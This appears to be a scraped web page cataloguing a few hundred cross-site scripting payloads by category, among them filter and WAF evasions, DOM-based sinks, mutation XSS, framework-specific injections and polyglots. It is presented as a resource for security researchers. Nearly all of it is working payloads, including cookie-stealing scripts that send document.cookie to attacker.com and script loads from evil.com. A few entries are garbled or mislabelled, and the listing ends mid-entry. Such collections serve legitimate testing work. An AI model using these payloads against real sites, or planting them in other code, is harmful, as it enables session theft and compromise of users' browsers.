FindXSS

FindXSS

Your definitive XSS payload directory, featuring 281 verified payloads for ethical hackers and security researchers.

All Payloads

281 Payloads
Basic Alerts
Basic script injection
<script>alert('XSS')</script>
beginner
Basic Alerts
Case-insensitive script tags
<SCRIPT>alert('XSS');</SCRIPT>
beginner
Basic Alerts
Image onerror event
<img src=x onerror=alert('XSS')>
beginner
event handlers
Basic Alerts
SVG onload event
<svg onload=alert('XSS')>
beginner
event handlers
Basic Alerts
Body onload event (less common in snippets)
<body onload=alert('XSS')>
event handlers
intermediate
Basic Alerts
iframe with javascript: URL
<iframe src="javascript:alert('XSS')"></iframe>
beginner
bypass filter
intermediate
Basic Alerts
Anchor tag with javascript: URL
<a href="javascript:alert('XSS')">Click Me</a>
beginner
Basic Alerts
Direct javascript: URI (URL context)
javascript:alert('XSS')
beginner
Cookie Stealing (Demo)
Alerting current document cookies
<script>alert(document.cookie)</script>
beginner
intermediate
Cookie Stealing (Demo)
Sending cookies to an attacker's server (DEMO ONLY)
<script>new Image().src='http://attacker.com/steal?cookie='+document.cookie;</script>
intermediate
Cookie Stealing (Demo)
Image onerror sending cookies (DEMO ONLY)
<img src=x onerror="this.src='http://attacker.com/steal?c='+document.cookie">
event handlers
intermediate
HTML Context (No Script Tag)
Image onerror event
<img src=x onerror=alert(1)>
bypass filter
event handlers
intermediate
HTML Context (No Script Tag)
SVG onload event
<svg onload=alert(1)>
bypass filter
event handlers
intermediate
HTML Context (No Script Tag)
Body onload event
<body onload=alert(1)>
bypass filter
event handlers
intermediate
HTML Context (No Script Tag)
iframe srcdoc attribute
<iframe srcdoc="<script>alert(1)</script>"></iframe>
bypass filter
advanced
intermediate
HTML Context (No Script Tag)
Meta refresh tag
<meta http-equiv="refresh" content="0; url=javascript:alert(1)">
bypass filter
advanced
intermediate
HTML Context (No Script Tag)
CSS @import statement
<style>@import 'javascript:alert(1)';</style>
bypass filter
advanced
HTML Context (No Script Tag)
CSS expression (IE only, deprecated)
<div style="width:expression(alert('XSS'))">
bypass filter
advanced
HTML Context (No Script Tag)
Object tag with javascript URI
<object data="javascript:alert(1)"></object>
bypass filter
intermediate
HTML Context (No Script Tag)
Embed tag with javascript URI
<embed src="javascript:alert(1)"></embed>
bypass filter
intermediate
HTML Context (No Script Tag)
Video source onerror
<video><source onerror="javascript:alert(1)">
bypass filter
event handlers
intermediate
Event Handlers
Mouseover event attribute
onmouseover=alert(1)
event handlers
bypass filter
intermediate
Event Handlers
Click event attribute
onclick=alert(1)
event handlers
bypass filter
intermediate
Event Handlers
Error event attribute (often on img, video, etc.)
onerror=alert(1)
event handlers
bypass filter
intermediate
Event Handlers
Autofocus with onfocus event
autofocus onfocus=alert(1)
event handlers
bypass filter
intermediate
Event Handlers
Input event on input field
<input oninput=alert(1)>
event handlers
intermediate
Event Handlers
Details toggle event
<details open ontoggle=alert(1)>
event handlers
advanced
intermediate
WAF Evasions
Nested script tags (simple bypass)
<scr<script>ipt>alert(1)</scr<script>ipt>
waf evasion
bypass filter
intermediate
WAF Evasions
String.fromCharCode evasion
<img src=x onerror="alert(String.fromCharCode(88,83,83))">
waf evasion
bypass filter
event handlers
intermediate
WAF Evasions
SVG with self-closing slash
<svg/onload=alert(1)>
waf evasion
bypass filter
event handlers
intermediate
WAF Evasions
Null byte injection (depends on backend)
<scri%00pt>alert(1)</scri%00pt>
waf evasion
bypass filter
advanced
WAF Evasions
Using 'javascript' with mixed case or non-alpha chars (depends on filter)
 giapptascript:alert(1)
waf evasion
bypass filter
intermediate
Real-World Attacks
Samy Worm (MySpace) - simplified background URL vector. Note: This is illustrative, actual worm was more complex.
 невидимка<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
advanced
Real-World Attacks
GitHub Meta Tag Exploit (Conceptual). Actual exploit involved specific meta tag parsing.
<meta property="al:ios:app_name" content=''><script>alert("GitHub Meta Tag Exploit Example")</script>
advanced
Real-World Attacks
Conceptual Magecart: <script src='//badsite.com/skim.js'></script> - This shows the type, not a working payload under current CSP.
/* External script injection, typical in Magecart attacks. Blocked by strong CSP. */
advanced
DOM-Based XSS
Location hash used by script with innerHTML. Example: ...innerHTML = location.hash.substring(1);
#<img src=x onerror=alert(1)>
dom
beginner
intermediate
DOM-Based XSS
Query parameter used by script with document.write. Example: document.write(new URLSearchParams(window.location.search).get('search'))
search=<script>alert(1)</script>
dom
intermediate
DOM-Based XSS
Using eval with location.hash. Requires user to set hash.
eval(location.hash.slice(1)) // then set URL to #alert(1)
dom
advanced
DOM-Based XSS
String argument to setTimeout from URL parameter.
setTimeout('alert(1)', 0) // if setTimeout sink takes string from URL
dom
advanced
Mutation XSS (mXSS)
Malformed SVG mutating to trigger XSS
<svg><p><style><img src="x" onerror="alert(1)">
mutation
advanced
Mutation XSS (mXSS)
Noscript tag mutation
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
mutation
advanced
Mutation XSS (mXSS)
Comment mutation
<!--><img src=x onerror=alert(1)>-->
mutation
advanced
Framework-Specific
React dangerouslySetInnerHTML. To be used as props e.g. <div dangerouslySetInnerHTML={{"__html": "<img src=x onerror=alert(1)>"}} />
{"__html": "<img src=x onerror=alert(1)>"}
framework
advanced
Framework-Specific
AngularJS sandbox escape
{{constructor.constructor('alert(1)')()}}
framework
advanced
Framework-Specific
AngularJS event handler injection
<input ng-focus=$event.path|orderBy:'(z=alert)(1)'>
framework
advanced
event handlers
Framework-Specific
Vue.js v-html directive
<div v-html="'<img src=x onerror=alert(1)>'"></div>
framework
advanced
Framework-Specific
Vue.js template injection (older versions/misconfig)
{{this.constructor.constructor('alert(1)')()}}
framework
advanced
Polyglot Payloads
Works in HTML attribute, then breaks out to create img tag
"><img src=x onerror=alert(1)>
polyglot
bypass filter
intermediate
Polyglot Payloads
Complex polyglot for multiple contexts
javascript:alert(1)//--></title></style></textarea></script></xmp>
polyglot
advanced
Polyglot Payloads
JS string, HTML attribute, and JS comment termination
'-alert(1)//
polyglot
intermediate
Polyglot Payloads
JS block comment, attribute, JS comment termination
*/alert(1)//
polyglot
intermediate
Polyglot Payloads
HTML attribute breakout to SVG
"><svg onload=alert(1)>
polyglot
bypass filter
event handlers
intermediate
iFrame Based
iframe with javascript: URL
<iframe src="javascript:alert('XSS')"></iframe>
beginner
bypass filter
intermediate
iFrame Based
iframe srcdoc with HTML encoded script
<iframe srcdoc="&lt;script&gt;alert('XSS')&lt;/script&gt;"></iframe>
bypass filter
advanced
intermediate
iFrame Based
iframe with data URI
<iframe src="data:text/html,<script>alert('XSS')</script>"></iframe>
bypass filter
advanced
intermediate
iFrame Based
iframe onload event (if content allows script)
<iframe onload="alert('XSS')"></iframe>
event handlers
intermediate
Obfuscated/Encoded
Base64 encoded payload with eval
<script>eval(atob('YWxlcnQoJ1hTUycp'))</script>
advanced
bypass filter
Obfuscated/Encoded
URL encoded payload with eval in onerror
<img src=x onerror="eval(unescape('%61%6c%65%72%74%28%27%58%53%53%27%29'))">
advanced
bypass filter
event handlers
Obfuscated/Encoded
Base64 encoded HTML in data URI
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">Click Me</a>
advanced
bypass filter
Obfuscated/Encoded
Using template literals for alert
<scRipt>alert`1`</scRipt>
bypass filter
intermediate
Basic Alerts
Details tag with ontoggle event
<details/open/ontoggle=alert`1`>
event handlers
bypass filter
intermediate
Basic Alerts
Bold tag with onmouseover
<b onmouseover=alert(1)>hover</b>
event handlers
intermediate
Basic Alerts
Marquee tag onstart event
<marquee onstart=alert(1)>
event handlers
advanced
Basic Alerts
Video tag onerror
<video src=1 onerror=alert(1)></video>
event handlers
intermediate
Basic Alerts
Audio tag onerror
<audio src=1 onerror=alert(1)></audio>
event handlers
intermediate
HTML Context (No Script Tag)
Form action javascript URI
<form action="javascript:alert(1)"><input type=submit></form>
bypass filter
intermediate
HTML Context (No Script Tag)
isindex tag (obsolete but might work)
<isindex type=image src=1 onerror=alert(1)>
bypass filter
event handlers
advanced
HTML Context (No Script Tag)
Body background attribute
<body background="javascript:alert(1)">
bypass filter
intermediate
WAF Evasions
Mixed case tags
<sCrIpt>alert(1)</sCriPt>
waf evasion
bypass filter
intermediate
WAF Evasions
Single quotes for attribute
<img src=x onerror='alert(1)'>
waf evasion
bypass filter
event handlers
intermediate
WAF Evasions
Backticks for attribute
<img src=x onerror=`alert(1)`>
waf evasion
bypass filter
event handlers
intermediate
WAF Evasions
Tabs and newlines in tag
<img 	 src=x 
 onerror=alert(1)>
waf evasion
bypass filter
event handlers
advanced
WAF Evasions
Double starting angle bracket
<<script>alert(1)//<</script>
waf evasion
bypass filter
advanced
DOM-Based XSS
Query param 'name' written to DOM. Ex: element.innerHTML = 'Welcome ' + params.get('name');
name=<img src=x onerror=alert(1)>
dom
intermediate
DOM-Based XSS
DOM XSS via eval and location.hash with polyglot characteristics
javascript:/*--></title></style></textarea></script>*/eval(location.hash.slice(1))//
dom
advanced
polyglot
DOM-Based XSS
DOM XSS via document.write and controllable pathname
document.write(location.pathname) // if path is /<img src=x onerror=alert(1)>
dom
advanced
Mutation XSS (mXSS)
SVG animate mutation
<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) />
mutation
advanced
Mutation XSS (mXSS)
MathML link mutation
<math><mi xlink:href=javascript:alert(1)>click</mi>
mutation
advanced
Framework-Specific
AngularJS ng-csp bypass
<div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>
framework
advanced
Framework-Specific
React dangerouslySetInnerHTML in props
props.dangerouslySetInnerHTML={{ __html: '<img src=x onerror=alert(1)>' }}
framework
advanced
Framework-Specific
Vue.js event handler injection
<div v-on:click="constructor.constructor('alert(1)')()">Click</div>
framework
advanced
event handlers
Basic Alerts
External script reference (simplified, assuming xss.rocks/xss.js contains alert(1))
<sCriPt sRc=//xss.rocks/xss.js></ScRiPt>
beginner
intermediate
Basic Alerts
Confirm box via img onerror
<iMg sRc=x OnErRoR=confirm(1)>
beginner
event handlers
intermediate
Basic Alerts
Prompt box via video onerror
<vIdEo sRc=x OnErRoR=prompt(1)></vIdEo>
beginner
event handlers
intermediate
Basic Alerts
Print dialog via audio onerror
<aUdio sRc=x OnErRoR=print()></aUdio>
beginner
event handlers
intermediate
Basic Alerts
Delayed alert using setTimeout
<scrIpt>setTimeout('alert(1)',10)</scrIpt>
beginner
intermediate
Basic Alerts
Repeating alert using setInterval (beware of annoyance)
<scrIpt>setInterval('alert(1)',5000)</scrIpt>
beginner
intermediate
Basic Alerts
Case variation for javascript URI in iframe
<iFrAmE sRc=JaVaScRiPt:alert(1)>
beginner
bypass filter
intermediate
Basic Alerts
javascript URI in img src (less common to execute)
<iMg sRc=javascript:alert(1)>
beginner
intermediate
Basic Alerts
Script tag within SVG
<sVg><sCriPt>alert(1)</sCriPt></sVg>
beginner
intermediate
Basic Alerts
Body onload with case variation
<bOdY oNlOaD=alert(1)>
event handlers
intermediate
Basic Alerts
Div onmouseover event
<dIv oNmOuSeOvEr=alert(1)>HOVER ME</dIv>
event handlers
intermediate
Basic Alerts
Textarea autofocus onfocus
<TeVtArEa AuToFoCuS oNfOcUs=alert(1)>
event handlers
intermediate
Basic Alerts
Input autofocus onfocus
<iNpUt TyPe=TeVt AuToFoCuS oNfOcUs=alert(1)>
event handlers
intermediate
Basic Alerts
Alerting current domain
<sCrIpT>alert(document.domain)</sCrIpT>
beginner
intermediate
Basic Alerts
HTML entity for colon in javascript URI
<a hReF="jAvAsCrIpT&colon;alert(1)">Click</a>
beginner
bypass filter
intermediate
Event Handlers
Drag event
ondrag=alert(1)
event handlers
intermediate
Event Handlers
Scroll event
onscroll=alert(1)
event handlers
intermediate
Event Handlers
Copy event
oncopy=alert(1)
event handlers
intermediate
Event Handlers
Cut event
oncut=alert(1)
event handlers
intermediate
Event Handlers
Paste event
onpaste=alert(1)
event handlers
intermediate
Event Handlers
Blur event on input
<input onblur=alert(1)>
event handlers
intermediate
Event Handlers
Change event on select
<select onchange=alert(1)><option>1</option></select>
event handlers
intermediate
Event Handlers
Keydown event
<input onkeydown=alert(1)>
event handlers
intermediate
Event Handlers
Keyup event
<input onkeyup=alert(1)>
event handlers
intermediate
Event Handlers
Keypress event
<input onkeypress=alert(1)>
event handlers
intermediate
Event Handlers
Mousedown event
<button onmousedown=alert(1)>Click</button>
event handlers
intermediate
Event Handlers
Mouseup event
<button onmouseup=alert(1)>Click</button>
event handlers
intermediate
Event Handlers
Mousemove event
<div onmousemove=alert(1)>Move here</div>
event handlers
intermediate
Event Handlers
Mouseout event
<div onmouseout=alert(1)>Move out</div>
event handlers
intermediate
Event Handlers
Mouseenter event
<div onmouseenter=alert(1)>Enter</div>
event handlers
intermediate
Event Handlers
Mouseleave event
<div onmouseleave=alert(1)>Leave</div>
event handlers
intermediate
Event Handlers
Submit event on form
<form onsubmit=alert(1)><input type=submit></form>
event handlers
intermediate
Event Handlers
Reset event on form
<form onreset=alert(1)><input type=reset></form>
event handlers
intermediate
Event Handlers
Iframe onloadstart event
<iframe onloadstart=alert(1)></iframe>
event handlers
advanced
intermediate
Event Handlers
Video onplay event
<video onplay=alert(1) src=http://example.com/vid.mp4></video>
event handlers
intermediate
Event Handlers
Video onpause event
<video onpause=alert(1) src=http://example.com/vid.mp4></video>
event handlers
intermediate
Event Handlers
Video onended event
<video onended=alert(1) src=http://example.com/vid.mp4></video>
event handlers
intermediate
Event Handlers
Audio onloadeddata event
<audio onloadeddata=alert(1) src=http://example.com/aud.mp3></audio>
event handlers
intermediate
Event Handlers
Checkbox onchange event
<input type=checkbox onchange=alert(1)>
event handlers
intermediate
Event Handlers
Touchstart event (mobile)
ontouchstart=alert(1)
event handlers
intermediate
HTML Context (No Script Tag)
bgsound tag (IE only)
<bgsound src="javascript:alert(1)">
bypass filter
advanced
HTML Context (No Script Tag)
CSS background-image with javascript URI
<div style="background-image: url(javascript:alert(1))">
bypass filter
advanced
HTML Context (No Script Tag)
CSS list-style-image with javascript URI
<div style="list-style-image: url(javascript:alert(1))">
bypass filter
advanced
HTML Context (No Script Tag)
Link tag with data URI CSS import
<link rel="stylesheet" href="data:text/css,@import 'javascript:alert(1)';">
bypass filter
advanced
HTML Context (No Script Tag)
Embedded style for list-style-image
<style>li {list-style-image: url("javascript:alert(1)")}</style><ul><li>
bypass filter
advanced
HTML Context (No Script Tag)
Object with scriptlet type (IE)
<object type="text/x-scriptlet" data="http://example.com/xss.html"></object>
bypass filter
advanced
HTML Context (No Script Tag)
Meta tag to set cookie (not XSS, but related injection vector often seen)
<meta http-equiv="Set-Cookie" content="cookievalue; path=/; domain=attacker.com; HttpOnly">
advanced
HTML Context (No Script Tag)
Base tag with javascript URI (affects relative URLs)
<base href="javascript:alert(1)//">
bypass filter
advanced
HTML Context (No Script Tag)
Applet tag (requires Java, very old)
<applet code="java.applet.Applet" archive="exploit.jar"></applet>
advanced
HTML Context (No Script Tag)
HTML Imports (deprecated)
<link rel=import href="data:text/html,<script>alert(1)</script>">
bypass filter
advanced
HTML Context (No Script Tag)
Frameset onload event
<frameset onload=alert(1)>
bypass filter
event handlers
intermediate
HTML Context (No Script Tag)
Table background attribute
<table background="javascript:alert(1)">
bypass filter
intermediate
HTML Context (No Script Tag)
Mozilla XBL binding (Firefox only, old)
<div style="-moz-binding:url('http://example.com/xss.xml#xss')">
advanced
HTML Context (No Script Tag)
HTC behavior (IE only)
<xss id=x style=behavior:url(#default#time2) onbegin=alert(1)>
advanced
HTML Context (No Script Tag)
XML data island with script (IE)
<xml id=x><x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)</x:script></xml>
advanced
HTML Context (No Script Tag)
Button formaction attribute
<button formaction=javascript:alert(1)>Click</button>
bypass filter
intermediate
HTML Context (No Script Tag)
Input type image with onerror
<input type=image src=x onerror=alert(1)>
bypass filter
event handlers
intermediate
HTML Context (No Script Tag)
Font family with script (very unlikely to work)
<div style="font-family:'<script>alert(1)</script>';">
advanced
HTML Context (No Script Tag)
Marquee onbounce event
<marquee onbounce=alert(1)>
event handlers
advanced
HTML Context (No Script Tag)
Marquee onfinish event
<marquee onfinish=alert(1)>
event handlers
advanced
HTML Context (No Script Tag)
Video poster attribute
<video poster=javascript:alert(1)//>
bypass filter
intermediate
HTML Context (No Script Tag)
Audio src with javascript URI
<audio src=javascript:alert(1)//>
bypass filter
intermediate
HTML Context (No Script Tag)
Malformed CSS import
<style>*[{}@import'javascript:alert(1)';/*]</style>
bypass filter
advanced
HTML Context (No Script Tag)
SVG link with javascript URI
<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">Click</text></a></svg>
bypass filter
advanced
intermediate
HTML Context (No Script Tag)
MathML with href (conceptual)
<math href="javascript:alert(1)">Click</math>
bypass filter
advanced
WAF Evasions
Hex encoded string with eval
<img src=x onerror="eval('\x61lert(1)')">
waf evasion
bypass filter
event handlers
advanced
WAF Evasions
Hex encoded function name access
<img src=x onerror="eval(window['\x61lert'](1))">
waf evasion
bypass filter
event handlers
advanced
WAF Evasions
Space after closing tag
<scriPt>alert(1)</scriPt >
waf evasion
bypass filter
intermediate
WAF Evasions
Hex encoded space
<script type="text/javascript">javascript:alert(1);</script>
waf evasion
bypass filter
advanced
WAF Evasions
Hex encoded carriage return
<script
type="text/javascript">javascript:alert(1);</script>
waf evasion
bypass filter
advanced
WAF Evasions
Hex encoded tab
<script	type="text/javascript">javascript:alert(1);</script>
waf evasion
bypass filter
advanced
WAF Evasions
Spaces around equals sign in event handler
<img src=x onerror = alert(1)>
waf evasion
bypass filter
event handlers
intermediate
WAF Evasions
Tab in javascript URI
jav	ascript:alert(1)
waf evasion
bypass filter
intermediate
WAF Evasions
Newline in javascript URI
java
script:alert(1)
waf evasion
bypass filter
intermediate
WAF Evasions
Hex HTML entities for javascript:alert(1)
&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;
waf evasion
bypass filter
advanced
WAF Evasions
Decimal HTML entities for javascript:alert(1)
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;
waf evasion
bypass filter
advanced
WAF Evasions
Decimal HTML entities in img src
<img src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>
waf evasion
bypass filter
advanced
WAF Evasions
Comments and newlines around alert
<script>/* 
 */alert(1)/* 
 */</script>
waf evasion
bypass filter
intermediate
WAF Evasions
String concatenation for function name
<script>var a = 'al'; var b = 'ert'; (this[a+b])(1);</script>
waf evasion
bypass filter
advanced
WAF Evasions
Tab char (encoded) in javascript URI
<IMG SRC="jav&#x09;ascript:alert('XSS');">
waf evasion
bypass filter
advanced
WAF Evasions
Encoded parentheses in event handler
<BODY ONLOAD=alert&#x28;1&#x29>
waf evasion
bypass filter
event handlers
advanced
WAF Evasions
Script source with unterminated tag
<SCRIPT SRC=//evil.com/a.js?<B>
waf evasion
bypass filter
advanced
WAF Evasions
Extra space before closing iframe tag
<IFRAME SRC="javascript:alert(1)" </IFRAME>
waf evasion
bypass filter
intermediate
WAF Evasions
PortSwigger's classic polyglot for breaking out of JS strings and HTML attributes
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
waf evasion
bypass filter
advanced
polyglot
WAF Evasions
Backticks and spaces in attributes
<img src="x` `<script>alert(1)</script>"`` >
waf evasion
bypass filter
advanced
WAF Evasions
Function constructor with backticks and hex
<img src=x onerror=Function`alert( 1)```>
waf evasion
bypass filter
event handlers
advanced
WAF Evasions
setInterval with backticks and hex in SVG
<svg onload=setInterval`alert( 1)`>
waf evasion
bypass filter
event handlers
advanced
WAF Evasions
Unicode characters for obfuscation (Myanmar)
<details/open/ontoggle=top[ခalertେ](1)>
waf evasion
bypass filter
event handlers
advanced
WAF Evasions
Comments inside script tags (may break or bypass)
<scri<!--test-->pt>alert(1)</sc<!--test-->ript>
waf evasion
bypass filter
advanced
WAF Evasions
Protocol confusion in src
<img src="x:gif" onerror="alert(1)">
waf evasion
bypass filter
event handlers
intermediate
WAF Evasions
Non-breaking space (UTF-8) in script tag
<s%c2%a0cript>alert(1)</s%c2%a0cript>
waf evasion
bypass filter
advanced
WAF Evasions
CSS animation XSS
<style>@keyframes x{}</style><div style="animation-name:x" onanimationstart="alert(1)"></div>
waf evasion
bypass filter
event handlers
advanced
WAF Evasions
JS variable construction for assignment
a="get";b="URL";c="javascript:";d="alert(1)";this[a+b]=c+d;
waf evasion
bypass filter
advanced
WAF Evasions
Object tag with data URI (often blocked by CSP)
<object data="data:text/html,<script>alert(1)</script>"></object>
waf evasion
bypass filter
advanced
WAF Evasions
Embed tag with base64 data URI (often blocked by CSP)
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
waf evasion
bypass filter
advanced
DOM-Based XSS
Source 'value' to sink 'eval'. Ex: eval(params.get('value'))
value=<img src=x onerror=alert(1)>&sink=eval
dom
advanced
DOM-Based XSS
Source 'iframe' to sink 'innerHTML'. Ex: div.innerHTML = params.get('iframe')
iframe=<iframe src=javascript:alert(1)></iframe>&sink=innerHTML
dom
advanced
DOM-Based XSS
Source 'url' to sink 'document.location'. Ex: document.location = params.get('url')
url=javascript:alert(1)&sink=location
dom
advanced
DOM-Based XSS
Source 'html' to sink 'document.write'. Ex: document.write(params.get('html'))
html=<svg onload=alert(1)>&sink=document.write
dom
intermediate
DOM-Based XSS
Source 'script' to sink 'Function'. Ex: new Function(params.get('script'))()
script=alert(1)&sink=Function
dom
advanced
DOM-Based XSS
Payload in URL, script uses document.URL.indexOf('#') and processes part after #.
payload=<img src=x onerror=alert(1)> #foo
dom
intermediate
DOM-Based XSS
Payload in URL, script uses document.URL.indexOf('?') and processes part after ?.
payload=<img src=x onerror=alert(1)> ?foo
dom
intermediate
DOM-Based XSS
Using window.name as source. Example: div.innerHTML = window.name;
window.name="<img src=x onerror=alert(1)>"; // then script uses window.name in a sink
dom
advanced
DOM-Based XSS
Using localStorage as source. Example: div.innerHTML = localStorage.getItem('xss');
localStorage.setItem('xss', '<img src=x onerror=alert(1)>'); // then script uses localStorage.getItem('xss') in sink
dom
advanced
DOM-Based XSS
Using sessionStorage as source. Example: div.innerHTML = sessionStorage.getItem('xss');
sessionStorage.setItem('xss', '<img src=x onerror=alert(1)>'); // then script uses sessionStorage.getItem('xss') in sink
dom
advanced
DOM-Based XSS
Using document.cookie as source. Example: div.innerHTML = document.cookie;
document.cookie="xss=<img src=x onerror=alert(1)>"; // then script uses document.cookie in sink
dom
intermediate
DOM-Based XSS
jQuery .html() sink with location.hash source
jQuery('#El').html(location.hash.substring(1)) // URL: page.html#<img src=x onerror=alert(1)>
dom
framework
intermediate
DOM-Based XSS
AngularJS .html() sink (jqLite) with location.hash source
angular.element('#El').html(location.hash.substring(1)) // URL: page.html#<img src=x onerror=alert(1)>
dom
framework
intermediate
DOM-Based XSS
jQuery .append() sink
$('#El').append(location.hash.substring(1)) // URL: page.html#<img src=x onerror=alert(1)>
dom
framework
intermediate
DOM-Based XSS
outerHTML sink
document.getElementById('El').outerHTML = location.hash.substring(1) // URL: page.html#<img src=x onerror=alert(1)>
dom
intermediate
DOM-Based XSS
document.evaluate sink (XPath injection)
document.evaluate(location.hash.substring(1), document, null, 0, null) // URL: page.html#//someXPathThatInjectsHTML
dom
advanced
DOM-Based XSS
createContextualFragment sink
Range.prototype.createContextualFragment.call(document.createRange(), location.hash.substring(1)) // URL: page.html#<img src=x onerror=alert(1)>
dom
advanced
DOM-Based XSS
insertAdjacentHTML sink
document.body.insertAdjacentHTML('afterbegin', location.hash.substring(1)) // URL: page.html#<img src=x onerror=alert(1)>
dom
intermediate
DOM-Based XSS
JSON.parse of user input leading to HTML injection
JSON.parse(location.hash.substring(1)).xss // URL: page.html#{"xss":"<img src=x onerror=alert(1)>"}
dom
advanced
DOM-Based XSS
postMessage DOM XSS. Ex: e.data.callback + '(' + e.data.msg + ')' then eval'd or innerHTML'd.
msg=<svg onload=alert(1)>&callback=handleMessage // if postMessage handler uses data in innerHTML
dom
advanced
DOM-Based XSS
document.referrer source
referrer=<img src=x onerror=alert(1)> // if script uses document.referrer in a sink
dom
intermediate
DOM-Based XSS
Base64 encoded payload in hash executed by Function constructor
Function(atob(location.hash.substring(1)))() // URL: page.html#YWxlcnQoMSk=
dom
advanced
bypass filter
DOM-Based XSS
URL encoded payload in hash for setTimeout
setTimeout(decodeURIComponent(location.hash.substring(1))) // URL: page.html#alert%281%29
dom
advanced
bypass filter
DOM-Based XSS
unescape with query string for document.write
document.write(unescape(location.search.substring(1))) // URL: page.html?<img%20src=x%20onerror=alert(1)>
dom
advanced
bypass filter
DOM-Based XSS
Programmatic click on a javascript: link
<a id=LNK href="javascript:alert(1)"></a><script>LNK.click()</script>
dom
advanced
Framework-Specific
Vue.js v-html with tainted data
<div v-html="userInput"></div> <!-- userInput = <img src=x onerror=alert(1)> -->
framework
advanced
Framework-Specific
Vue.js attribute binding to javascript URI
<a :href="'javascript:alert(1)'">Click</a>
framework
advanced
bypass filter
Framework-Specific
Vue.js event handler assignment prototype pollution (conceptual)
{{ $on.click = constructor.constructor('alert(1)') }}
framework
advanced
Framework-Specific
React dangerouslySetInnerHTML from props
<div dangerouslySetInnerHTML={{__html: props.data}}></div> <!-- props.data = <img src=x onerror=alert(1)> -->
framework
advanced
Framework-Specific
React href prop with javascript URI
<a href={javascriptURI}>Click</a> <!-- javascriptURI = 'javascript:alert(1)' -->
framework
advanced
bypass filter
Framework-Specific
AngularJS eval of user input in expression
eval('{{userInput}}') // userInput = alert(1) in AngularJS expression
framework
advanced
Framework-Specific
AngularJS ng-bind-html, needs $sanitize bypass
<div ng-bind-html="userInput"></div> <!-- userInput = <img src=x onerror=alert(1)> (requires $sanitize bypass or $sce.trustAsHtml) -->
framework
advanced
Framework-Specific
AngularJS ng-bind-html with controller value and SCE bypass
ctrl.value = '<img src=x onerror=alert(1)>'; // then {{ctrl.value}} is used in ng-bind-html with SCE bypass
framework
advanced
Framework-Specific
AngularJS sandbox escape (complex)
{{ ::'a'.constructor.prototype.charAt=''.valueOf.call.call(eval,alert(1)) }}
framework
advanced
Framework-Specific
Svelte {@html ...} tag injection
SvelteComponent.$set({ html: '<img src=x onerror=alert(1)>' }) // if component uses {@html ...}
framework
advanced
Framework-Specific
Handlebars template injection
{{#with this}}{{constructor.constructor 'alert(1)'()}}{{/with}}
framework
advanced
Framework-Specific
AngularJS $injector service to call alert
<script>var anXSS = require('angular'); anXSS.module('xss', []).value('x', '$window').run(['$injector', function($injector) { $injector.get($injector.get('x').alert)(1); }]);</script><div ng-app=xss>
framework
advanced
Framework-Specific
React dynamic element creation from JSON
{"element":"a","props":{"href":"javascript:alert(1)"},"children":"Click Me"} // if JSON used to render React elements
framework
advanced
Framework-Specific
Knockout.js html binding
<div data-bind="html: evilHtml"></div> <!-- evilHtml = <img src=x onerror=alert(1)> -->
framework
advanced
Framework-Specific
Apache Tapestry event handler injection (conceptual)
<t:input t:type="text" t:value="prop:inputValue" onclick="alert(1)"/>
framework
advanced
Polyglot Payloads
HTML attribute, JS string, and comment
"/onload=alert(1)//
polyglot
bypass filter
intermediate
Polyglot Payloads
Close previous script and start new one
></script><script>alert(1)</script>
polyglot
bypass filter
intermediate
Polyglot Payloads
Hex encoded script tags
<script>alert(1)</script>
polyglot
bypass filter
advanced
Polyglot Payloads
JS template literal, HTML attribute, comment
`-alert(1)//
polyglot
bypass filter
intermediate
Polyglot Payloads
JS string in URI, HTML attribute, comment
javascript:'alert(1)'"//
polyglot
bypass filter
intermediate
Polyglot Payloads
Multi-line JS comment and execution
*/alert(1);/*
polyglot
intermediate
Polyglot Payloads
HTML comment breakout
--!><script>alert(1)</script><!--
polyglot
bypass filter
intermediate
Polyglot Payloads
Attribute injection, works if src is missing/invalid
onerror=alert(1) src=a:
polyglot
event handlers
intermediate
Polyglot Payloads
JS string breakout
'); alert(1); //
polyglot
intermediate
Polyglot Payloads
JS comment in javascript URI
javascript:/**/alert(1)
polyglot
bypass filter
intermediate
Polyglot Payloads
Recursive script tag attempt
<scri<script>pt>alert(1)</scri</script>pt>
polyglot
waf evasion
intermediate
Polyglot Payloads
Leading space, single quote for src attribute
 src='javascript:alert(1)'
polyglot
bypass filter
intermediate
Polyglot Payloads
No space between attribute and onerror
<img src='x'onerror='alert(1)'>
polyglot
event handlers
bypass filter
intermediate
Polyglot Payloads
Backtick, double, single quote attribute breakout
`"'><img src=x onerror=alert(1)>
polyglot
bypass filter
advanced
Polyglot Payloads
JS object literal execution
<script>({0:alert}(1))</script>
polyglot
advanced
iFrame Based
VBScript URI in iframe (IE only)
<iframe src="VbScRiPt:alert(1)"></iframe>
bypass filter
advanced
iFrame Based
SVG in iframe srcdoc
<iframe srcdoc="<svg onload=alert(1)>" />
bypass filter
advanced
event handlers
intermediate
iFrame Based
Base64 encoded SVG in iframe data URI
<iframe src="data:text/html;charset=utf-8;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+PC9zdmc+"></iframe>
bypass filter
advanced
event handlers
intermediate
iFrame Based
iframe src with commented out end
<iframe src="javascript:'<script>alert(1)</script>'//">
bypass filter
intermediate
iFrame Based
iframe with sandbox allowing scripts (if original context disallows)
<iframe sandbox="allow-scripts" srcdoc="<script>alert(1)</script>"></iframe>
advanced
intermediate
iFrame Based
